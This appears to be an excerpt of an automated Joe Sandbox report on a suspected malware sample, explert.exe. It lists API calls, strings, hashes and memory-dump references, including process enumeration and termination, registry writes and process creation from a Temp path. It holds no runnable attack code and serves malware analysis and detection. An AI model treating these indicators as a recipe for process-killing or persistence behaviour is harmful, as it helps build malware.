                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                            • String ID: ,V$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 2638373210-563886639
                                                                                                                                                                                            • Opcode ID: f79f432ffee02c6279f475860ac2c238344e912886373d5cf6554cdf4eac2777
                                                                                                                                                                                            • Instruction ID: b2b8a38ef7c0e13b62ae962ac9addd2ac22e2b5adc4cad9ed5267509651027f1
                                                                                                                                                                                            • Opcode Fuzzy Hash: f79f432ffee02c6279f475860ac2c238344e912886373d5cf6554cdf4eac2777
                                                                                                                                                                                            • Instruction Fuzzy Hash: 30A18936A001099FCB18CF6DC885AAEBBA5FF84320F148169FC19DB351DA31ED44CB90
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • }LV, xrefs: 00564B7B
                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe, xrefs: 00564B2F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe$}LV
                                                                                                                                                                                            • API String ID: 0-706804828
                                                                                                                                                                                            • Opcode ID: a54b994df0531878e428a8c8104f0652760f2c72ba73772579df8098ba3dad86
                                                                                                                                                                                            • Instruction ID: baad47b6c1652ba4aa4efad8865f1eeac3400e2b4ce60b24d5834cd1cab19d72
                                                                                                                                                                                            • Opcode Fuzzy Hash: a54b994df0531878e428a8c8104f0652760f2c72ba73772579df8098ba3dad86
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21807560810AAFDF20AF65DC95E6B7FADFB803B87108515F91597161EB60EC408B60
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 005663FF: _free.LIBCMT ref: 00566424
                                                                                                                                                                                            • _free.LIBCMT ref: 00566701
                                                                                                                                                                                              • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
                                                                                                                                                                                              • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
                                                                                                                                                                                            • _free.LIBCMT ref: 0056670C
                                                                                                                                                                                            • _free.LIBCMT ref: 00566717
                                                                                                                                                                                            • _free.LIBCMT ref: 0056676B
                                                                                                                                                                                            • _free.LIBCMT ref: 00566776
                                                                                                                                                                                            • _free.LIBCMT ref: 00566781
                                                                                                                                                                                            • _free.LIBCMT ref: 0056678C
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
                                                                                                                                                                                            • Instruction ID: 3d34e756b2dd9079a0ed920974f7f921588ce16fc5eea71460e4fb2b0844a2d1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bb7cfefca59b01fdb6ef220bd872d0b4c475c341da5657b3a5c2d1b5605872d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B115171640B06BBD521B7B0CC1BFCB7FACBFC0B40F400C29BA9967252DA75B5058650
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00556637,?,?,005565FF,00000001,00000000,?), ref: 00556657
                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0055666A
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00556637,?,?,005565FF,00000001,00000000,?), ref: 0055668D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                            • String ID: @0S$CorExitProcess$mscoree.dll
                                                                                                                                                                                            • API String ID: 4061214504-38058037
                                                                                                                                                                                            • Opcode ID: 0d8e23fc375b6c218af9c9ce41496cd0948e89b62390e570b8de36b63ad21486
                                                                                                                                                                                            • Instruction ID: 324df62bc6505420b71ec093a6a80c2fb6f84f28f96234cc0a223e1b004d5261
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d8e23fc375b6c218af9c9ce41496cd0948e89b62390e570b8de36b63ad21486
                                                                                                                                                                                            • Instruction Fuzzy Hash: F9F08234501218FBDB119B64EC1AB9D7EA8FB01756F000160E905B31A0CBB09E05FA94
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleOutputCP.KERNEL32(00000010,00000000,?), ref: 0055DE9E
                                                                                                                                                                                            • __fassign.LIBCMT ref: 0055E083
                                                                                                                                                                                            • __fassign.LIBCMT ref: 0055E0A0
                                                                                                                                                                                            • WriteFile.KERNEL32(?,00000010,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0055E0E8
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0055E128
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0055E1D0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1735259414-0
                                                                                                                                                                                            • Opcode ID: f190ce61500fdf60f4be70a3cf2b69993072ad27871bf577e1b570d0c21e688a
                                                                                                                                                                                            • Instruction ID: c55d9a90a390d14cbe127cb0a043ff432fb12c4c621ff34d334d18f012fd218b
                                                                                                                                                                                            • Opcode Fuzzy Hash: f190ce61500fdf60f4be70a3cf2b69993072ad27871bf577e1b570d0c21e688a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 67C1BE75D002599FCB18CFA8C8959EDBFB5BF48304F28416AE816F7241D6319E4ACF60
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 005505A7
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00550635
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005506A7
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005506C1
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00550724
                                                                                                                                                                                            • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00550741
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide$CompareInfoString
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2984826149-0
                                                                                                                                                                                            • Opcode ID: 6dd46b3c1b2f43bbcd30eb3a1806befef67ab45a6a72bf7017390ec6b2e91a27
                                                                                                                                                                                            • Instruction ID: bd9a13449d6dd11f83e43dd4eb1cd154fe753630c7f03ab479b9c0066dd6f900
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dd46b3c1b2f43bbcd30eb3a1806befef67ab45a6a72bf7017390ec6b2e91a27
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A71707591020AABDF218FA4CC65AEE7FB6FF89352F141057EC05A61D1EA31D848DFA0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0055032B
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00550396
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005503B3
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 005503F2
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00550451
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00550474
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: ByteCharMultiStringWide
• String ID:
• API String ID: 2829165498-0
APIs
Strings
Similarity
• API ID: _strrchr
• String ID: $iU
• API String ID: 3213747228-1866154683
APIs
• GetLastError.KERNEL32(?,?,00553951,005527FB,005515E7), ref: 00553968
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00553976
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0055398F
• SetLastError.KERNEL32(00000000,00553951,005527FB,005515E7), ref: 005539E1
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
Strings
Similarity
• API ID: AdjustPointer
• String ID: @0S
• API String ID: 1740715915-2734645871
APIs
• FreeLibrary.KERNEL32(00000000,?,?,?,00554AB3,?,?,00580B4C,00000000,?,00554BDE,00000004,InitializeCriticalSectionEx,00571958,mscoree.dll,00000000), ref: 00554A82
Strings
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
APIs
• _free.LIBCMT ref: 005661A0
  • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
  • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
• _free.LIBCMT ref: 005661B2
• _free.LIBCMT ref: 005661C4
• _free.LIBCMT ref: 005661D6
• _free.LIBCMT ref: 005661E8
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• std::locale::_Init.LIBCPMT ref: 00531D46
Strings
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initstd::locale::_
                                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                            • API String ID: 1620887387-1866435925
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 0053254F
Strings
Similarity
• API ID: ___std_exception_copy
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2659868963-1866435925
APIs
• std::locale::_Init.LIBCPMT ref: 00531F88
Strings
Similarity
• API ID: Initstd::locale::_
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 1620887387-1866435925
APIs
• std::locale::_Init.LIBCPMT ref: 00544D99
  • Part of subcall function 0054F760: std::_Lockit::_Lockit.LIBCPMT ref: 0054F772
  • Part of subcall function 0054F760: std::locale::_Setgloballocale.LIBCPMT ref: 0054F78D
  • Part of subcall function 0054F760: _Yarn.LIBCPMT ref: 0054F7A3
  • Part of subcall function 0054F760: std::_Lockit::~_Lockit.LIBCPMT ref: 0054F7E3
Strings
Similarity
• API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 238635018-1866435925
APIs
• CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 0053F447
• CloseHandle.KERNEL32(?), ref: 0053F45A
• CloseHandle.KERNEL32(?), ref: 0053F45F
Strings
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: D
• API String ID: 2922976086-2746444292
APIs
• _free.LIBCMT ref: 0056C9E4
• _free.LIBCMT ref: 0056CA0D
• SetEndOfFile.KERNEL32(00000000,0056ACFD,00000000,0056AF94,?,?,?,?,?,?,?,0056ACFD,0056AF94,00000000), ref: 0056CA3F
• GetLastError.KERNEL32(?,?,?,?,?,?,?,0056ACFD,0056AF94,00000000,?,?,?,?,00000000), ref: 0056CA5B
Similarity
• API ID: _free$ErrorFileLast
• String ID:
• API String ID: 1547350101-0
APIs
  • Part of subcall function 005593E4: _free.LIBCMT ref: 005593F2
  • Part of subcall function 0056408B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00561A10,?,00000000,00000000), ref: 00564137
• GetLastError.KERNEL32 ref: 005644FE
• __dosmaperr.LIBCMT ref: 00564505
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00564544
• __dosmaperr.LIBCMT ref: 0056454B
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
APIs
• GetLastError.KERNEL32(00531920,00000001,00531924,00556D0D,00000001,00000000,00000000,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CA95
• _free.LIBCMT ref: 0055CAF2
• _free.LIBCMT ref: 0055CB28
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,0055CD85,00000000,00000000,00000001,00000000,00531920,00000104), ref: 0055CB33
Similarity
• API ID: ErrorLast_free
APIs
• GetLastError.KERNEL32(?,?,?,00558B2B,005609C0,?,?,005518D8,?,?,?,?,?,005311E3,?,?), ref: 0055CBEC
• _free.LIBCMT ref: 0055CC49
• _free.LIBCMT ref: 0055CC7F
• SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,005518D8,?,?,?,?,?,005311E3,?,?), ref: 0055CC8A
Similarity
• API ID: ErrorLast_free
APIs
• K32EnumProcesses.KERNEL32(?,00001000,?), ref: 0053134D
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00531397
• TerminateProcess.KERNEL32(00000000,00000000), ref: 005313A2
• CloseHandle.KERNEL32(00000000), ref: 005313A9
Similarity
• API ID: Process$CloseEnumHandleOpenProcessesTerminate
APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00000002,?), ref: 00539ECC
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000010,?), ref: 00539EF9
• RegCloseKey.ADVAPI32(?), ref: 00539F06
• RegCloseKey.ADVAPI32(?), ref: 00539F10
Similarity
• API ID: Close$OpenValue
APIs
• WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,00000000,?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000), ref: 0056C504
• GetLastError.KERNEL32(?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000,?,00000000,?,0055E779,00000010), ref: 0056C510
  • Part of subcall function 0056C4D6: CloseHandle.KERNEL32(FFFFFFFE,0056C520,?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000,?,00000000), ref: 0056C4E6
• ___initconout.LIBCMT ref: 0056C520
  • Part of subcall function 0056C498: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0056C4C7,00568E3F,00000000,?,0055E22D,?,00000010,00000000,?), ref: 0056C4AB
• WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,?,00568E52,00000000,00000001,00000000,00000000,?,0055E22D,?,00000010,00000000,?), ref: 0056C535
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
APIs
• _free.LIBCMT ref: 0055BCA8
  • Part of subcall function 0055CE37: HeapFree.KERNEL32(00000000,00000000,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?), ref: 0055CE4D
  • Part of subcall function 0055CE37: GetLastError.KERNEL32(?,?,00566429,?,00000000,?,?,?,005666CC,?,00000007,?,?,00566BBF,?,?), ref: 0055CE5F
• _free.LIBCMT ref: 0055BCBB
• _free.LIBCMT ref: 0055BCCC
• _free.LIBCMT ref: 0055BCDD
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                                                            • Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_530000_explert.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                            • Opcode ID: 2c4c3dd4f6272c17a6cc474db12ee4427166e9a90917dc9ff5b79a3f64a10043
                                                                                                                                                                                            • Instruction ID: 7da714cc8b81c54b61a560244257a9c573cac778a0ab1bdcfe88dbd9faffe674
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c4c3dd4f6272c17a6cc474db12ee4427166e9a90917dc9ff5b79a3f64a10043
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7E0B671800A21AE87826F14BE5B45B3E3DBBB4B517057407FD2032271DA72655EFF89
APIs
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0053EF60
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Ios_base_dtorstd::ios_base::_
• String ID: 0$H
• API String ID: 323602529-1388647558
• Opcode ID: e44eda4911ab0d178b341d7c5f0e6e1b589e78d19a398e97193e8ab283347e0d
• Instruction ID: 063f6da4d93934b5383b96754bd4082c00750a56b29e9dc633f95578bdb868b1
• Opcode Fuzzy Hash: e44eda4911ab0d178b341d7c5f0e6e1b589e78d19a398e97193e8ab283347e0d
• Instruction Fuzzy Hash: 66A15D74A002199FDB14CF58C885BDEBBB5BF49300F1485E8E449AB381DB70AE89CF91
APIs
• __startOneArgErrorHandling.LIBCMT ref: 0055919D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: fccc94c055a23962e2225939ebd0ae1b7ba30c3c9de107ea8be3ff25d65e7eea
• Instruction ID: 3eee60543f35e46c544889d329ef856876e2a7146099ee07041bdb69ad20ea5f
• Opcode Fuzzy Hash: fccc94c055a23962e2225939ebd0ae1b7ba30c3c9de107ea8be3ff25d65e7eea
• Instruction Fuzzy Hash: 37519C61A08603D6CB117714DD2936A3FA8FB90742F204D5AF895432E9EB398DDDFB42
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 0053FB90
• Concurrency::cancel_current_task.LIBCPMT ref: 0053FB95
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: Concurrency::cancel_current_task
• String ID: eT
• API String ID: 118556049-1760902009
• Opcode ID: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
• Instruction ID: 0e34cbac363ad5007c83a97fb210ab533ef0a2512ce15204e88b68f0f85b99e5
• Opcode Fuzzy Hash: 7333919df190098a016cfe7dbdb365896b105da4e3f8f89e44a2f20269ce9e39
• Instruction Fuzzy Hash: 1B419F75A007019FD724CF29C4A0A6AFBE1FF58711F14892EE89A87711D731ED95CB90
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID:
• String ID: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
• API String ID: 0-3350077389
• Opcode ID: ac42a1f838aced4eab65b501b249c3e6a697f93f5a57a4018b79f7c6c328d1de
• Instruction ID: 93dd97fb4c3d1d8d23e910073c1bc1d822478e3143daf3e6d4f20b5a46ffd38a
• Opcode Fuzzy Hash: ac42a1f838aced4eab65b501b249c3e6a697f93f5a57a4018b79f7c6c328d1de
• Instruction Fuzzy Hash: DB41BEB1A00215EFDB229B99D8959AEBFFDFB85311F100067EC04A7250E7B49E48DB60
APIs
• EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00554097
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: b63b6077db45e670c5e5b6b0a1a7aad49fbf040f977e28cb7e8260189a092a62
• Instruction ID: 546d50af7add87e9863318d899c7c22e700be1965d933f9c5d85fe40ccc06ac5
• Opcode Fuzzy Hash: b63b6077db45e670c5e5b6b0a1a7aad49fbf040f977e28cb7e8260189a092a62
• Instruction Fuzzy Hash: FF418831900209AFCF15CF98CC95AAEBFB5BF48309F14805AFD04AB261D3359AA4CF50
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 005323CE
Strings
Memory Dump Source
• Source File: 00000003.00000002.1678973157.0000000000531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000003.00000002.1678936967.0000000000530000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679025395.000000000056E000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679067944.000000000057F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.1679109963.0000000000582000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_530000_explert.jbxd
Similarity
• API ID: ___std_exception_copy
• String ID: c4S$ios_base::failbit set
• API String ID: 2659868963-823812268
• Opcode ID: 56b24ddd386cd44f45507306ed0a2fcb6a86b7d9410112049b50e215a1b2d51e
• Instruction ID: 896479d7ce6e22c89144b21afa39143437be76e106a168b5d71124ff9ab764a0
• Opcode Fuzzy Hash: 56b24ddd386cd44f45507306ed0a2fcb6a86b7d9410112049b50e215a1b2d51e
• Instruction Fuzzy Hash: 0E21D476600509ABD704DF68C885AAEFFBDFF85310F10855AF9449B341E771AD858BA0
APIs
Strings
Memory Dump Source
